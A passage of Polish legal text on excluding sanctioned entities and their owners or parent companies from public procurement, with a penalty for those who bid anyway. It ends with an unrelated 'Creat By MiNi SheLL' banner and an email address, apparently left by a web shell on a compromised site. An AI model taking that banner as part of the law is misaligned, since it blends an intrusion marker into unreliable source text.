wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/><br/>Ustawa przewiduje również karę pieniężną nakładaną na osoby lub podmioty podlegające wykluczeniu na podstawie art. 7 ust. 1 ustawy, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego.

Creat By MiNi SheLL
Email: jattceo@gmail.com